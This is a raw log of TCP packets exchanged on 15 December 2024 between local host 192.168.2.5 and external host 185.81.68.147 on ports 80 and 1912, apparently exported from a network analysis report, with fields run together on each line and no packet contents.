                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.679306030 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.679393053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.681601048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.681644917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.681689978 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.683731079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.683790922 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.683856010 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.685882092 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.685935020 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.685981035 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.688121080 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.688178062 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.688241959 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.690300941 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.690371037 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.690437078 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.692543983 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.692622900 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.692637920 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.694732904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.694816113 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.694838047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.696965933 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.697030067 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.697062969 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.699187040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.699250937 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.699304104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.701384068 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.701443911 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.701493979 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.703649998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.703762054 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.703766108 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.705816984 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.705956936 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.705997944 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.708018064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.708067894 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.708143950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.710294962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.710349083 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.710350037 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.712467909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.712517023 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.712568045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.714689970 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.714737892 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.714818001 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.716888905 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.716944933 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.717010975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.719122887 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.719170094 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.719239950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.721374035 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.721424103 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.721432924 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.723550081 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.723592997 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.723624945 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.725766897 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.725811005 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.725933075 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.728002071 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.728048086 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.728056908 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.730220079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.730273962 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.730379105 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.732434034 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.732520103 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.732520103 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.734668016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.734713078 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.734782934 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.736846924 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.736903906 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.736938000 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.739075899 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.739121914 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.739203930 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.741282940 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.741345882 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.741425037 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.743470907 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.743607998 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.819808960 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.819916010 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.819997072 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.820672989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.820774078 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.820820093 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.822602034 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.822748899 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.822794914 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.824508905 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.824616909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.824666977 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.826383114 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.826512098 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.826565981 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.826867104 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.946592093 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:09.052084923 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:09.172493935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:09.172630072 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:09.172729969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:09.292596102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:09.813255072 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:09.933413029 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:09.933518887 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:09.942442894 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.062200069 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502324104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502350092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502367020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502399921 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502454996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502491951 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502672911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502688885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502705097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502720118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502727032 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502737045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502763033 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502968073 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.503000021 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.622824907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.622857094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.622977972 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.626028061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.676907063 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.694302082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.694351912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.694462061 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.701054096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.701361895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.701469898 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.707026005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.707062960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.707156897 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.715239048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.715374947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.715464115 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.723735094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.723751068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.723856926 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.732099056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.732311964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.732419014 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.740678072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.740732908 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.740853071 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.748928070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.749075890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.749305010 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.757534981 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.757570982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.757683992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.765824080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.765933990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.766045094 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.796936035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.797055960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.797285080 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.801070929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.848766088 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.859308958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.859328985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.859443903 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.886271000 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.886434078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.886548996 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.888732910 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.888842106 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.888950109 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.893522024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.893563032 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.893665075 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.898344994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.898385048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.898494005 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.903028011 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.903042078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.903151035 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.907828093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.907841921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.907953024 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.912719011 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.912731886 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.912856102 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.917386055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.917401075 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.917546034 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.922121048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.922133923 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.922236919 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.927016973 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.927028894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.927139997 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.931626081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.934320927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.934425116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.936563969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.936575890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.936674118 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.941322088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.941334963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.941461086 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.946141958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.946155071 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.946273088 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.950862885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.950875044 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.950985909 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.955583096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.955624104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.955766916 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.960362911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.960489035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.960577011 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.965271950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.965284109 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.965401888 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.969968081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.969986916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.970138073 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.974653006 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.974783897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.974874020 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.979468107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.979563951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.979651928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.984225035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.984357119 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.984450102 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.989172935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.036412954 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.051223993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.051239014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.051496029 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.053108931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.078140974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.078157902 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.078469992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.079754114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.079855919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.080007076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.082279921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.082317114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.082350969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.085552931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.085659027 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.085763931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.088776112 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.088855028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.088902950 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.091867924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.091902971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.091969967 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.094840050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.094875097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.094943047 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.097815990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.097851992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.097918987 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.100606918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.100754023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.100754976 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.103760004 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.103794098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.103859901 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.106607914 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.106642962 CET8049708185.81.68.147192.168.2.5
